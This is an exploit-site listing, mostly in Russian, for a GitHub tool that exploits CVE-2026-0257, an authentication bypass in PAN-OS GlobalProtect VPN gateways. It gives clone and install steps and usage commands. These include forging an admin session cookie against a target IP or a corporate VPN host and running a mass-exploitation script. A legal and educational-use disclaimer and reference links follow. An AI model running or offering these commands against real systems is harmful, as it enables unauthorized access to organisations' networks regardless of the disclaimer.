## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-0257
# CVE-2026-0257
Уязвимость обхода аутентификации PAN-OS GlobalProtect
* * *
## ⚡ Простое использование
Используйте этот проект только в безопасных и авторизованных средах, таких как:
* Локальные виртуальные машины
* Docker-контейнеры
* Изолированные лабораторные стенды
* Авторизованные среды тестирования на проникновение
Пример настройки:
root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-0257
cd CVE-2026-0257
# Create virtual environment
python -m venv venv
# Active virtual environment
# Linux / macOS:
source venv/bin/activate
# Windows
venv\Scripts\activate
# Install requirments
pip install -r requirements.txt
Пример использования:
root@kitploit:~
# Single target
# Basic usage
python forge_cookie.py --target 192.168.1.100 --user admin
# Advanced usage
python forge_cookie.py --target vpn.company.com \
--port 443 \
--user administrator \
--context both \
--verbose
# Max exploit
python mass_exploit.py
* * *
## Источники и ссылки
* https://github.com/sfewer-r7/CVE-2026-0257
* https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257/
* * *
# 📚 Образовательный репозиторий по исследованиям в области безопасности
Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
* * *
## ⚠️ Дисклеймер о безопасности и правовых аспектах
## Назначение
Этот репозиторий предназначен **только для образовательных и авторизованных исследований в области безопасности**.
Он создан, чтобы помочь пользователям узнать о:
* Уязвимостях безопасности
* Концепциях песочниц и изоляции
* Безопасном кодировании и защитных практиках
* * *
## Только авторизованное использование
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
* Личные лаборатории или виртуальные машины
* Docker или изолированные среды
* Авторизованное тестирование на проникновение
* Обучение кибербезопасности или академические исследования
Несанкционированное или незаконное использование строго запрещено.
* * *
## Отсутствие ответственности
Автор и участники **не несут ответственности** за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
* Вы несёте ответственность за свои действия
* Вы будете использовать его законно и этично
* Проект предоставляется **без каких-либо гарантий**
* * *
## Этичное использование
Этот проект предназначен для:
* Исследований в области защитной безопасности
* Образования в сфере кибербезопасности
* Повышения осведомлённости об уязвимостях
* Исследований безопасных систем и программного обеспечения
Пожалуйста, следуйте практикам ответственного раскрытия уязвимостей и соблюдайте все применимые законы.
* * *
## Контакты
Для ответственного раскрытия уязвимостей или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.